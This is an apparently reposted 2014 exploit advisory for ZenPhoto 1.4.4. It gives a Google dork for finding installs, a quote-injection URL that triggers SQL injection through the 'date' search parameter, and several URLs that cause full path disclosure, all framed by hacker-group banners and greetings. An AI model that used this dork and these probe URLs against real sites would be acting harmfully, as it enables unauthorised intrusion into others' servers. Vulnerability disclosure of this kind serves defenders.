ZenPhoto 1.4.4 Path Disclosure / SQL Injection

2014.01.24
Credit: KedAns-Dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22
CWE-89

########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright &#169; 2014 | Dz Offenders Cr3w ]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ###################################################################### # # [>] Title : ZenPhoto v1.4.4 (SQLi/Disclosure) Multiple Vulnerabilities # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : SQL Injection , Multiple Full Path Disclosure # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [>] ^_^ Greetings to 1337day Users/FAN's <3 *_* , i'm leaving 1337day # [-] F-ck Hacking , LuV Exploiting .. Penetration-Testing rouls # ####################################################################### # # [!] Description : # # ZenPhoto version 1.4.4 is suffer from multiple vulnerabilities # remote attacker can use some MySQL bug in (&date=) and exploit it # as SQL Injection ,and access to some files and get errors with the # Full Path of this files and use it to disclosure the target full path. # # [!] CWE = CWE-89 , CWE-22 # ##### # [!] Google Dork : # intext:"Powered by zenPHOTO" ##### # [+] Exploit (1) ' SQL Injection ' :=> # # - http://[target]/[path]/index.php?p=search&date=' # - http://127.0.0.1/zenphoto/index.php?p=search&date=' [SQL Injection] # # - p.o.c image : (http://oi41.tinypic.com/zme90m.jpg) # ##### # [+] Exploit (2) ' Full Path Disclosure ' : # # - http://127.0.0.1/zenphoto/zp-core/zp-extensions/tiny_mce.php # - http://127.0.0.1/zenphoto/zp-core/zp-extensions/uploader_http.php # - http://127.0.0.1/zenphoto/zp-core/zp-extensions/uploader_flash.php # - http://127.0.0.1/zenphoto/zp-core/zp-extensions/uploader_jQuery.php # - http://127.0.0.1/zenphoto/zp-core/utilities/refresh_database.php # - http://127.0.0.1/zenphoto/zp-core/utilities/refresh_metadata.php # ####################################################################### #### # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !> # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )= ####


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top